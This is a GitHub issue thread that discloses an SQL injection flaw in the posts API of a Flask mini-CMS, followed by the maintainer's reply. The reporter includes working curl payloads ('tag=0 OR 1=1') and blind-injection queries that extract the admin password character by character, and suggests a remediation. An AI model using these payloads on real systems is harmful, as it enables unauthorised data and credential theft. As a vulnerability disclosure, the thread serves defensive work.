### ISSUE TITLE
SQL Injection vulnerability

### ISSUE THREAD

**Issue by xanhacks** [eugene-afk/flask-mini-cms#1]
Hey,

There is an SQL Injection vulnerability on your API, endpoint  @public.route('/api/posts/<int:id>', methods=['GET'])
=> https://github.com/eugene-afk/flask-mini-cms/blob/master/server/project/public.py#L42

```bash
$ curl --get 'http://localhost:50550/api/posts/1' --data-urlencode "tag=0"
{"current_page":1,"posts":[],"total_pages":0}

$ curl --get 'http://localhost:50550/api/posts/1' --data-urlencode "tag=0 OR 1=1"
{"current_page":1,"posts":[{"author":"toto","category_id":1,"id":1,"img":"default.jpg","publishDate":"2021-11-05 11:30","shortDesc":"Very cool description.","tags":[{"tag_name":"help"}],"title":"My first post"}],"total_pages":1}
```

Then you can extract the administrator password by using this kind of query :
```
?tag=1 AND 'a'=(SELECT SUBSTR(password, 1, 1) FROM user WHERE id = 1)
?tag=1 AND 'b'=(SELECT SUBSTR(password, 1, 1) FROM user WHERE id = 1)
?tag=1 AND 'c'=(SELECT SUBSTR(password, 1, 1) FROM user WHERE id = 1)
...
```

For the remediation, I suggest you to use the `in_()` function of SQLAlchemy instead of `text()`.

Regards,
xanhacks

**Comment by eugene-afk** [comment]
Hello, xanhacks! Thanks for your interesting in my repo :)

I tested your method to extract admin password and it's really possible. I agree with you that this endpoint is unsafe and I will fix this in the next update.
 
But actually, the password you can get this way is encrypted. Therefore, it will take a lot more effort to gain control over the account.
